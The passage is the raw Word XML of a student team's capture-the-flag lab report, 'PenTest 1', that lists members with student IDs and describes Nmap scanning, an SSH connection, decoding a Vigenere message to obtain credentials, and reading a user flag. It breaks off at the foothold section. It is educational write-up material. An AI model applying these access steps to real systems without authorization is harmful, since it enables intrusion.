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11188" w14:textId="244CEDD2" w:rsidR="006024E5" w:rsidRDefault="007155E4" w:rsidP="0071224A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
        <w:t>PenTest 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D59D0" w14:textId="1A8D23DA" w:rsidR="007155E4" w:rsidRDefault="002359B1" w:rsidP="0071224A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
        <w:t>ROOM A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142356FB" w14:textId="0CCC7B8E" w:rsidR="007155E4" w:rsidRDefault="0071224A" w:rsidP="0071224A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
        <w:t>uwugang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9CB8AB" w14:textId="2326BFA1" w:rsidR="006024E5" w:rsidRPr="007155E4" w:rsidRDefault="007155E4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="160"/>
          <w:szCs w:val="160"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Members</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a"/>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3674"/>
        <w:gridCol w:w="3272"/>
      </w:tblGrid>
      <w:tr w:rsidR="006024E5" w14:paraId="0E567B90" w14:textId="77777777" w:rsidTr="0071224A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A652ADA" w14:textId="77777777" w:rsidR="006024E5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3674" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66299F8C" w14:textId="77777777" w:rsidR="006024E5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3272" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65DA9A18" w14:textId="77777777" w:rsidR="006024E5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071224A" w14:paraId="4B9436CD" w14:textId="77777777" w:rsidTr="0071224A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26CF0BEB" w14:textId="2B478F02" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:t>1211101376</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3674" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70091095" w14:textId="60786211" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:t>Isaiah Wong Terjie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3272" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26CE18A5" w14:textId="769FA000" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:t>Leader</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071224A" w14:paraId="5BF815A9" w14:textId="77777777" w:rsidTr="0071224A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10072D8B" w14:textId="37D24D31" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>1211101321</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3674" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E6AE384" w14:textId="7A42CC8D" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:t>Muhammad Zafran Bin Mohd Anuar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3272" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65A73DBB" w14:textId="06F9587E" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:t>Member</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071224A" w14:paraId="012BD5D1" w14:textId="77777777" w:rsidTr="0071224A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5763CF5B" w14:textId="5FB6078A" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:t>1211100857</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3674" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B16C388" w14:textId="32EDE737" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:t>Javier Austin Anak Jawa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3272" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2357FA58" w14:textId="0C0B0A2C" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:t>Member</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071224A" w14:paraId="720F359E" w14:textId="77777777" w:rsidTr="0071224A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DE71D53" w14:textId="602A0FB5" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:t>1211100824</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3674" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="765CA655" w14:textId="2B74DE51" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:t>Ahmad Danial Bin Ahmad Fauzi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3272" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B65F906" w14:textId="2F675023" w:rsidR="0071224A" w:rsidRDefault="0071224A" w:rsidP="0071224A">
            <w:r>
              <w:t>Member</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09B67039" w14:textId="77777777" w:rsidR="006024E5" w:rsidRDefault="006024E5"/>
    <w:p w14:paraId="36FBDE26" w14:textId="77777777" w:rsidR="006024E5" w:rsidRDefault="006024E5"/>
    <w:p w14:paraId="778639EC" w14:textId="77777777" w:rsidR="006024E5" w:rsidRDefault="006024E5"/>
    <w:p w14:paraId="7368FA48" w14:textId="77777777" w:rsidR="006024E5" w:rsidRDefault="006024E5"/>
    <w:p w14:paraId="1D569D8F" w14:textId="77777777" w:rsidR="006024E5" w:rsidRDefault="006024E5"/>
    <w:p w14:paraId="1EE7451A" w14:textId="77777777" w:rsidR="006024E5" w:rsidRDefault="006024E5"/>
    <w:p w14:paraId="5D2C59A6" w14:textId="77777777" w:rsidR="007155E4" w:rsidRDefault="007155E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F038370" w14:textId="77777777" w:rsidR="007155E4" w:rsidRDefault="007155E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C102332" w14:textId="77777777" w:rsidR="007155E4" w:rsidRDefault="007155E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33ECC317" w14:textId="77777777" w:rsidR="007155E4" w:rsidRDefault="007155E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F608E7" w14:textId="77777777" w:rsidR="007155E4" w:rsidRDefault="007155E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1036F856" w14:textId="77777777" w:rsidR="007155E4" w:rsidRDefault="007155E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E4BF7B2" w14:textId="2EC5513D" w:rsidR="0061269A" w:rsidRPr="0061269A" w:rsidRDefault="00880C15" w:rsidP="007155E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="0061269A" w:rsidRPr="0061269A">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Recon and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B71C1EC" w14:textId="64F379EA" w:rsidR="00902C72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Members Involved</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00902C72">
        <w:t>Muhammad Zafran Bin Mohd Anuar, Javier Austin Anak Jawa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125AF3E1" w14:textId="79AC7772" w:rsidR="006024E5" w:rsidRPr="007155E4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tools used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="007155E4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidR="00902C72">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>, SSH, Vig</w:t>
      </w:r>
      <w:r w:rsidR="00A778B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00902C72">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nere </w:t>
      </w:r>
      <w:r w:rsidR="00A778B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tool</w:t>
      </w:r>
      <w:r w:rsidR="00957AEE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>, Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464AC40C" w14:textId="1BACB035" w:rsidR="006024E5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Thought Process and Methodology and Attempts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF0AEE1" w14:textId="3CD89D13" w:rsidR="0071224A" w:rsidRDefault="0071224A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>At first Muhammad Zafran Bin Mohd Anuar tried to put the IP in the web browser but it did not work at all. However, Javier Austin Anak Jawa went ahead to run a Nmap scan with the IP and listed out the ports and services of the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735AC12D" w14:textId="1F4E5533" w:rsidR="00975083" w:rsidRDefault="0071224A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>They found out that</w:t>
      </w:r>
      <w:r w:rsidR="00767827">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> there are thousands of ports ranging from 9000 to 13783 running on Dropbear sshd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7135027C" w14:textId="1B274598" w:rsidR="00975083" w:rsidRDefault="00975083">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975083">
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C8752C8" wp14:editId="5240C148">
            <wp:extent cx="3039805" cy="4267200"/>
            <wp:effectExtent l="114300" t="95250" r="103505" b="9525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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3044701" cy="4274073"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                    <a:effectLst>
                      <a:glow>
                        <a:schemeClr val="accent1">
                          <a:alpha val="40000"/>
                        </a:schemeClr>
                      </a:glow>
                    </a:effectLst>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="101600">
                      <a:extrusionClr>
                        <a:schemeClr val="bg1"/>
                      </a:extrusionClr>
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C824500" w14:textId="77777777" w:rsidR="00696548" w:rsidRDefault="00696548">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA5974F" w14:textId="2FFEC630" w:rsidR="00767827" w:rsidRDefault="00767827">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Muhammad Zafran Bin Mohd Anuar</w:t>
      </w:r>
      <w:r w:rsidR="00696548">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> used a command that he found from </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:tooltip="https://askubuntu.com/questions/836048/ssh-returns-no-matching-host-key-type-found-their-offer-ssh-dss" w:history="1">
        <w:r w:rsidR="00696548" w:rsidRPr="00696548">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>https://askubuntu.com/questions/836048/ssh-returns-no-matching-host-key-type-found-their-offer-ssh-dss</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00696548">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ran “ssh -oHostKeyAlgorithms=+ssh-rsa IP:MACHINE -p PORT”. Once he ran the command, there was a signal that was shown which is either HIGHER or LOWER, when he tested out the ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E61F31" w14:textId="3AD2DFDD" w:rsidR="007826CD" w:rsidRDefault="007826CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Later when he connected to right port, we got this random message which seems to be an encrypted text</w:t>
      </w:r>
      <w:r w:rsidR="00A778B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. We went to a website called </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00A778B0" w:rsidRPr="00736BC8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          </w:rPr>
          <w:t>https://www.boxentriq.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A778B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to detect the encrypted text. The website detected that the words require a Vigenere tool to decipher it. Once we decipher it, we got </w:t>
      </w:r>
      <w:r w:rsidR="00A778B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the secret and proceeded to key it in. Then, we were given the credentials for the user named </w:t>
      </w:r>
      <w:r w:rsidR="00A778B0" w:rsidRPr="00A778B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jabberwock</w:t>
      </w:r>
      <w:r w:rsidR="00A778B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAD0A1D" w14:textId="195F2D84" w:rsidR="00A778B0" w:rsidRDefault="00A778B0">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A778B0">
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CB71F15" wp14:editId="43B60F37">
            <wp:extent cx="5731510" cy="2763520"/>
            <wp:effectExtent l="76200" t="95250" r="97790" b="11303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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2763520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="114300">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361D22E" w14:textId="18A1795E" w:rsidR="00A778B0" w:rsidRDefault="00A778B0">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A778B0">
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="587C6820" wp14:editId="53A9E330">
            <wp:extent cx="3410426" cy="409632"/>
            <wp:effectExtent l="76200" t="76200" r="76200" b="857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0426" cy="409632"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="63500">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B9C97E" w14:textId="34409144" w:rsidR="003A0756" w:rsidRDefault="003A0756">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>User Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE8759C" w14:textId="12F4A8A2" w:rsidR="00D01647" w:rsidRPr="003A49E6" w:rsidRDefault="003A0756">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">After receiving the credentials, Javier Austin Anak Jawa proceeded to login by SSH and listed the files that are inside the directory of jabberwock. Then, </w:t>
      </w:r>
      <w:r w:rsidR="003A49E6" w:rsidRPr="003A49E6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Three files were visible inside the directory, and in accordance with our inquiry, they requested a user flag, so we chose to open the user.txt file</w:t>
      </w:r>
      <w:r w:rsidR="003A49E6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. Finally, we got our first flag, but we </w:t>
      </w:r>
      <w:r w:rsidR="00880C15">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>must</w:t>
      </w:r>
      <w:r w:rsidR="003A49E6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse</w:t>
      </w:r>
      <w:r w:rsidR="00880C15">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the text</w:t>
      </w:r>
      <w:r w:rsidR="003A49E6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> by adding an additional command called </w:t>
      </w:r>
      <w:r w:rsidR="003A49E6" w:rsidRPr="003A49E6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>| rev</w:t>
      </w:r>
      <w:r w:rsidR="003A49E6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A952A5" w14:textId="2DB4D263" w:rsidR="003A0756" w:rsidRPr="0071224A" w:rsidRDefault="003A0756">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A0756">
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CF7F310" wp14:editId="557C739A">
            <wp:extent cx="4086225" cy="1693616"/>
            <wp:effectExtent l="76200" t="76200" r="85725" b="7810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4118641" cy="1707052"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:scene3d>
                      <a:camera prst="orthographicFront"/>
                      <a:lightRig rig="threePt" dir="t"/>
                    </a:scene3d>
                    <a:sp3d contourW="69850">
                      <a:contourClr>
                        <a:schemeClr val="bg1"/>
                      </a:contourClr>
                    </a:sp3d>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E37B8B7" w14:textId="77777777" w:rsidR="00AA6EF3" w:rsidRDefault="00AA6EF3" w:rsidP="003A49E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6D76CD" w14:textId="77777777" w:rsidR="00AA6EF3" w:rsidRDefault="00AA6EF3" w:rsidP="003A49E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293A6A40" w14:textId="77777777" w:rsidR="00AA6EF3" w:rsidRDefault="00AA6EF3" w:rsidP="003A49E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FD4378" w14:textId="77777777" w:rsidR="00AA6EF3" w:rsidRDefault="00AA6EF3" w:rsidP="003A49E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EBBCBA" w14:textId="77777777" w:rsidR="00AA6EF3" w:rsidRDefault="00AA6EF3" w:rsidP="003A49E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19253EEF" w14:textId="64123798" w:rsidR="006024E5" w:rsidRDefault="00880C15" w:rsidP="003A49E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2) Initial Foothold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FCDA5D" w14:textId="270251AC" w:rsidR="00AA6EF3" w:rsidRDefault="00AA6EF3" w:rsidP="00AA6EF3">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Members Involved</w:t>
      </w:r>
      <w:r>
        <w:t>: Isaiah Wong Terjie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46520F37" w14:textId="5701A577" w:rsidR="00AA6EF3" w:rsidRPr="007155E4" w:rsidRDefault="00AA6EF3" w:rsidP="00AA6EF3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tools used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidR="00957AEE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>, Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551E7B15" w14:textId="77777777" w:rsidR="00AA6EF3" w:rsidRDefault="00AA6EF3" w:rsidP="00AA6EF3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Thought Process and Methodology and Attempts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047768D1" w14:textId="77777777" w:rsidR="00AA6EF3" w:rsidRDefault="00AA6EF3" w:rsidP="003A49E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
